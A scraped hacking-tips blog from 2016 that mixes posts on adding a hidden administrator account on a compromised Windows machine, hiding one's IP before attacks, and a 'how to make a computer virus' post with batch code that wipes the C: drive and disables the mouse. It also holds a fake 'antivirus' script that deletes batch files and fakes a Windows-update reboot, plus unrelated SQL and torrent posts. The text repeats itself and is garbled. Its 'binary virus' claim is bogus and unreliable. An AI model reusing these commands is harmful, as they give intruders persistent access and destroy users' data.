Thursday, 13 October 2016
Sunday, 9 October 2016
Friday, 7 October 2016
Tuesday, 4 October 2016
Sunday, 2 October 2016
Friday, 30 September 2016
How to Add User With Administrator Rights Using Command Prompt
"How to Add User With Administrator Rights Using Command Prompt". If you follow this tips and trick, maybe it will not exceed 1 minute, even for some of you can do it in less than 30 second
This tips and trick will add a user with administrative rights, you will need it when you owned a system to add a user there.
Okay lets start it.
Requirement :
1. Command Prompt [or] shell you got from a compromised system
Step by Step :
1. Open your command prompt and type this command :
net user /add v4L 12345
The command above will add user name v4L with password 12345. If you just add until this step, you just add user with limited privilege.
2. The next step, we continue to add another command
net localgroup administrators v4L /add
Now in this 2nd step, we add our user v4L to administrators group. Now this user already has an administrative rights.
3. We move again to the last 3rd step, now lets type again another command :
net share concfg*C:\/grant:v4L,full
or
net share SHARE_NAME=c:\ /grant:v4L,full
The command above will grant user name v4L will full grant, that’s mean v4L can do everything on the system including see other users file 🙂
Hope it useful
Share this article if you found this post was useful
This tips and trick will add a user with administrative rights, you will need it when you owned a system to add a user there.
Okay lets start it.
Requirement :
1. Command Prompt [or] shell you got from a compromised system
Step by Step :
1. Open your command prompt and type this command :
net user /add v4L 12345
The command above will add user name v4L with password 12345. If you just add until this step, you just add user with limited privilege.
2. The next step, we continue to add another command
net localgroup administrators v4L /add
Now in this 2nd step, we add our user v4L to administrators group. Now this user already has an administrative rights.
3. We move again to the last 3rd step, now lets type again another command :
net share concfg*C:\/grant:v4L,full
or
net share SHARE_NAME=c:\ /grant:v4L,full
The command above will grant user name v4L will full grant, that’s mean v4L can do everything on the system including see other users file 🙂
Hope it useful
Share this article if you found this post was useful
Friday, 16 September 2016
How to Hide Your IP Address or How to Change your IP Address
is one of the biggest concerns of all Hackers as the IP Address can
reveal the identity if the Hacker. Its just like your online address. If
anyone can find your actual online address (IP Address), tracing you
back won’t be that difficult.
Thus it is very important to hide or change your IP address before doing any kind of hacking attack or even think of doing so.
After getting hundreds of request on a tutorial on how to hide your IP
address, here I am writing a detailed step by step tutorial on how to
hide or change ip address.
We are using the proxy service called Hide my Ass (pro VPN).
What’s that? Let me explain in detail.
We all know about proxy servers. They help us to hide your ip address or change ip address but there are many things you guys don’t know.
1) Free proxies are not completely anonymous – Your up can be disclosed by
the website owner to the concerned authorities if needed.
2)Companies limit the maximum speed of browsing in free proxies – Say your
internet speed is 8 Mbps, still using free proxies you can browse
internet with a speed of only 265 kbps. This is irritating, isn’t it.
3) Many Webmasters can block users accessing free proxies.
There are different type of proxies. Read Types of Proxy | How to Hide IP Address for more.
Even I wanted a reliable and Elite Proxy which can help me completely hide
my Online Identity and what else could be better than changing my IP
address every minute. I looked for many solutions online and then I
found the PRO VPN of Hide My Ass.
To be very honest, in the beginning I was a bit confused when I saw the
software. I was not very sure if it would work the way I wanted to but
then I gave it a try. I thought of jiving it a try just for 1 month. It
was just for $11.52 then , not it costs $9.99 only. I could actually
think of spending $11.52 for my only if it gave me the kind on anonymity
I wanted on internet. It helped me secure my online Identity online.
Here are benefits I got after using the PRO VPN of Hide My Ass.
- Super fast, high speed elite / anonymous proxies. Elite proxies are 100 times more secure than free proxies
- I could select the country whose IP address I wanted in just 1 click. It
offers over 38000+ unique IP Address from 53 different countries. - I can set the timer to automatically change the IP Address. This way my
IP Address gets changed every minute without me bothering to do so. If I
am implementing a hacking attack, no-one could actually find my actual
IP Address so I am always on the safer side. - It anonymously
encrypts all the traffic and works with all kind of platforms. Unlike
free proxies the PRO VPN of Hide My Ass is not blocked by the websites.
The traffic seems to be of legitimate human users, not proxies so on one
can catch you using them.
Friday, 5 August 2016
Free Hacking Course
Complete Free Hacking Course: Go from Beginner to Expert Hacker Today!
Everything you need to get started as a hacker and take your hacking skills to an expert level is included in this free screen capture HD video tutorial course! Begin with the basics of hacking including what is ethical hacking, introduction to hacking terms, and how hackers setup their computers. Follow along as you see exactly what software you need including VirtualBox and Kali Linux. See what to do next after you
Everything you need to get started as a hacker and take your hacking skills to an expert level is included in this free screen capture HD video tutorial course! Begin with the basics of hacking including what is ethical hacking, introduction to hacking terms, and how hackers setup their computers. Follow along as you see exactly what software you need including VirtualBox and Kali Linux. See what to do next after you
Saturday, 25 June 2016
Creating An Advanced Antivirus with Notepad

If you are lazy to download antivirus (let alone pay for) there is another way in eradicating the virus. That is, with "Notepad." Okay, the way he is with a script / codethat is typed in notepad, then notepad replaced its extension. Well, other than toeradicate the virus, you can surprise your friends who do not know this. Well, here's how:
Method 1: eliminate or eradicate the virus do you know his name
1.Open Notepad
2.Copy and Paste the code below
@echo off
echo turns of the virus
taskkill /F /IM virusname1.exe /IM virusname2.exe
echo remove all viruses by size
for /R C:\ %%a in (*.exe) do if %%~za equ 157184 del /A: H S R A “%%a”
echo remove virus that disguised
echo to drive c and subfolder
for /R C:\ %%a in (*.doc.exe) do del “%%a”
echo to drive d and subfolder
for /R D:\ %%a in (*.doc.exe) do del “%%a”
echo returns the Document is in the Hidden
cd /d c:\
echo to drive c and subfolder
attrib *.doc -H -S -A /S
cd /d d:\
echo to drive d and subfolder
attrib *.doc -H -S -A /S
exit
echo turns of the virus
taskkill /F /IM virusname1.exe /IM virusname2.exe
echo remove all viruses by size
for /R C:\ %%a in (*.exe) do if %%~za equ 157184 del /A: H S R A “%%a”
echo remove virus that disguised
echo to drive c and subfolder
for /R C:\ %%a in (*.doc.exe) do del “%%a”
echo to drive d and subfolder
for /R D:\ %%a in (*.doc.exe) do del “%%a”
echo returns the Document is in the Hidden
cd /d c:\
echo to drive c and subfolder
attrib *.doc -H -S -A /S
cd /d d:\
echo to drive d and subfolder
attrib *.doc -H -S -A /S
exit
Description: virusname1 and virusname2 be filled with the virus name you know.
4.Save As with the name Anything.bat , change to All Files and not TXT (Just have to bat extension). Example: Antivirus.bat
Method 2: Remove Virus do you know his name and remove any virus bat
Method 2: Remove Virus do you know his name and remove any virus bat
1.Open Notepad
2.Copy and Paste the code below
x=msgbox("Anti-Virus should delete some of the virus's that you may have.",1+16 , "Alert")
x=msgbox("what this does is removes anything that Has any text that seems like a virus",1+16 ,"Alert")
x=msgbox("It will also go through your computer and delete All Batch Files.",1+16 ,"Alert")
x=msgbox("If you want any of you .bat files saved then do so before hitting okay",1+16 ,"Alert")
x=msgbox("The Anti-Virus software is now ready to begin.
click okay to begin".1+16 ,"Alert")
del (:'bat*):
x=msgbox("All BAT Files sucessfully removed. click okay to Continue,",1+16 ,"Alert)
del virus.vbs
del virus.bat
del torjan.bat
del torjan.vbs
del infected.bat
del infected.vbs
del TROJ.bat
x=msgbox("Anti-Virus should delete some of the virus's that you may have.",1+16 , "Alert")
x=msgbox("what this does is removes anything that Has any text that seems like a virus",1+16 ,"Alert")
x=msgbox("It will also go through your computer and delete All Batch Files.",1+16 ,"Alert")
x=msgbox("If you want any of you .bat files saved then do so before hitting okay",1+16 ,"Alert")
x=msgbox("The Anti-Virus software is now ready to begin.
click okay to begin".1+16 ,"Alert")
del (:'bat*):
x=msgbox("All BAT Files sucessfully removed. click okay to Continue,",1+16 ,"Alert)
del virus.vbs
del virus.bat
del torjan.bat
del torjan.vbs
del infected.bat
del infected.vbs
del TROJ.bat
del TOR.vbs
del Torjan Horse.Bat
del Torjan Horse.vbs
del OM.bat
del OM.vbs
del Macro Virus.bat
del Micro Virus.vbs
del conflicker.bat
del conflicker.bat
del Torjan Horse.Bat
del Torjan Horse.vbs
del OM.bat
del OM.vbs
del Macro Virus.bat
del Micro Virus.vbs
del conflicker.bat
del conflicker.bat
del trojan.bat
del trojan.vbs
del Trojan Horse.Bat
del Trojan Horse.vbs
x=msgbox("Anti-Virus Completed...Will Now test and make working",1+16 ,"Alert)
open notepad
open mspaint
open controlpanel
open MyDocuments
x=msgbox("Now we will Shutdown/Restart your computer, and windows will install an important update for your computer",1+16 ,"Alert)
Shutdown -r -c "Rebooting computer for important windows updates"
x=msgbox(anti-Virus Software Complete. The program now close.",1+16,;"Alert")
x=msgbox("Anti-Virus Completed...Will Now test and make working",1+16 ,"Alert)
open notepad
open mspaint
open controlpanel
open MyDocuments
x=msgbox("Now we will Shutdown/Restart your computer, and windows will install an important update for your computer",1+16 ,"Alert)
Shutdown -r -c "Rebooting computer for important windows updates"
x=msgbox(anti-Virus Software Complete. The program now close.",1+16,;"Alert")
Description: You can add the name of the virus you know.
4.Save As with the name Anything.bat , change to All Files and not TXT (Just have to bat extension). Example: Antivirus.batTuesday, 7 June 2016
How to Make a Computer Virus
>>>Virus that format C: Drive:
1. Open Notepad and copy below code into it.@Echo off
Del C: *.* |y
3. Now, running this file will delete all the content of C Drive.

>>>Virus that Disable Mouse:
- Open Notepad and copy below codes
rem ———————————
rem Disable Mouse
set key=”HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ———————————
- Save this file as virus.bat
- Done you just created your virus.
>>>Virus that create binary virus to format HARDDIsK:
1. Copy the below codes into Notepad.
010010110001111100100101010101010100000111111000002. Save the file as Format.exe
3. You just created virus to format Hard Drive. Enjoy !!!
Warning: Please don’t try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
How to add a reference to SQL Server Compact 4.0 for Central Deployment
-
In Solution Explorer, right-click References and select Add Reference.
Note If the References folder is not listed in Solution Explorer, click Show All Files at the top of Solution Explorer.
-
In the list of .NET Assemblies, select System.Data.SqlServerCe, and then click OK. If System.Data.SqlServerCe is not listed, follow these steps:
-
In the Add References dialog box, click Browse.
-
Navigate to the following folder: %Program Files%\Microsoft SQL Server Compact Edition\v4.0\Desktop.
-
Select System.Data.SqlServerCe.dll, then click OK.
Note
If your project uses the Entity Framework, repeat the same steps to add a reference to System.Data.SqlServerCe.Entity. You can add System.Data.SqlServerCe.Entity from list of .NET assemblies, or you can browse to %Program Files%\Microsoft SQL Server Compact Edition\v4.0.
-
In the Add References dialog box, click Browse.
-
In Solution Explorer, right-click Form1.cs or Form1.vb and select View Code.
-
At the top of the code for the form, add a directive to use the System.Data.SqlServerCe namespace. If you use the Entity Framework, add a directive to use the System.Data.SqlServerCe namespace. For a Tablet PC application, also add a directive to use the Tablet PC API:
-
C#
using System.Data.SqlServerCe; using System.Data.SqlServerCe.Entity; using Microsoft.Ink;
-
Visual Basic
Imports System.Data.SqlServerCe Imports System.Data.SqlServerCe.Entity Imports Microsoft.Ink
-
C#
Wednesday, 1 June 2016
Watch Torrent Videos Online without Downloading 2016
Torrent
is one of the most popular tool for downloading movies and other
videos. But the problem with the torrent is that many of the links
provided are fake, which is quite difficult to identify. Some of the
torrents come with sample video quality where you can check video
quality, and download it, if it satisfies you.
But what about rest?? I mean those torrents that don not come with any sample! How will you identify between fake and genuine torrent. For that I'm going to give you a small trick that works well in Chrome, Firefox and Opera.

TS(Torrent Stream) magic plays torrents online in the original quality without downloading.It works same as torrent,based on number of peers connected to us.If the peers are more and internet connection is good streaming will be fast.Or we can stream it for some time to check quality of the video,if the quality is good we can download that film or video using utorrent.
But what about rest?? I mean those torrents that don not come with any sample! How will you identify between fake and genuine torrent. For that I'm going to give you a small trick that works well in Chrome, Firefox and Opera.

TS(Torrent Stream) magic plays torrents online in the original quality without downloading.It works same as torrent,based on number of peers connected to us.If the peers are more and internet connection is good streaming will be fast.Or we can stream it for some time to check quality of the video,if the quality is good we can download that film or video using utorrent.
Downloading TS magic player:
- Download and install TS magic player from http://torrentstream.org/
- Now install browser plug in
- Chrome users click here
- Opera users Click here
- Open torrent URL
- Now you will see an option to play online
- If not then right click on "Download torrent link" and select "View Torrent Online"
how to Select/Insert/Delete/Update records in SQL Server Compact database file(*.sdf) in VB.NET.
how to Select/Insert/Delete/Update records in SQL Server Compact database file(*.sdf) in VB.NET.
Please check the following code sample demonstrating how to Select/Insert/Delete/Update records in SQL Server Compact database file(*.sdf) in VB.NET.
I presume the SQL Server Compact database file C:\Northwind.sdf contains a Table named Users which has two fields as below: Field Name Data Typename Varchar(20)phone Varchar(20)
Imports System.Data.SqlServerCe |
Public Class Form1 |
' Shared variables |
Dim con As SqlCeConnection = New SqlCeConnection("Data Source=C:\Northwind.sdf") |
Dim cmd As SqlCeCommand |
Dim myDA As SqlCeDataAdapter |
Dim myDataSet As DataSet |
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load |
ShowData() |
End Sub |
'Binding database table to DataGridView |
Public Sub ShowData() |
cmd = New SqlCeCommand("Select * FROM Users", con) |
If con.State = ConnectionState.Closed Then con.Open() |
myDA = New SqlCeDataAdapter(cmd) |
myDataSet = New DataSet() |
myDA.Fill(myDataSet, "MyTable") |
DataGridView1.DataSource = myDataSet.Tables("MyTable").DefaultView |
End Sub |
' Retrieve/Select records |
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click |
cmd = New SqlCeCommand("SELECT * FROM Users Where name='Martin'", con) |
If con.State = ConnectionState.Closed Then con.Open() |
Dim sdr As SqlCeDataReader = cmd.ExecuteReader() |
While sdr.Read = True |
MessageBox.Show(sdr.Item("name") & " " & sdr.Item("phone")) |
End While |
sdr.Close() |
End Sub |
' Insert record |
Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click |
cmd = New SqlCeCommand("Insert Into Users(name, phone) Values('phenry', ‘88866677’)", con) |
If con.State = ConnectionState.Closed Then con.Open() |
cmd.ExecuteNonQuery() |
ShowData() 'Rebinding to DataGridView and view result |
End Sub |
' Update record |
Private Sub Button3_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button3.Click |
cmd = New SqlCeCommand("Update Users Set phone=’34’ Where name='Martin'", con) |
If con.State = ConnectionState.Closed Then con.Open() |
cmd.ExecuteNonQuery() |
ShowData() 'Rebinding to DataGridView and view result |
End Sub |
'Delete record |
Private Sub Button4_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button4.Click |
cmd = New SqlCeCommand("Delete * From Users Where name='Martin'", con) |
If con.State = ConnectionState.Closed Then con.Open() |
cmd.ExecuteNonQuery() |
ShowData() 'Rebinding to DataGridView and view result |
End Sub |
' Dispose Database Connection object |
Private Sub Form4_FormClosed(ByVal sender As System.Object, ByVal e As System.Windows.Forms.FormClosedEventArgs) Handles MyBase.FormClosed |
con.Close() |
con = Nothing |
End Sub |
End Class |
Monday, 30 May 2016
HACKING PARROT DRONES
Two security researchers at the recent Def Con conference presented the results of their studies on hacking Parrot drones. Their findings are surprising.
At the recent Def Con conference in Las Vegas, security experts
demonstrated in two different talks how to exploit vulnerabilities in
commercial drones manufactured by Parrot.
In one of the attacks, the researchers were able to shoot down the
aircraft making it fall, the technique was able also to hit the Bebop
model.
The circumstance is disconcerting if we think that an attacker can use the drone to hit a target.
Ryan Satterfield, a security expert from the Planet Zuda firm,
demonstrated a takedown of a Parrot A. R. Drone by exploiting the
drone’s built-in Wi-Fi, the researchers accessed the UAV through an open
Telnet port in the implementation of the BusyBox OS.
The expert connected to the drone through the open port, gaining root
access to the controller, then it was a joke for him to kill the
processes used to control the flight of the drone.
Subscribe to:
Posts (Atom)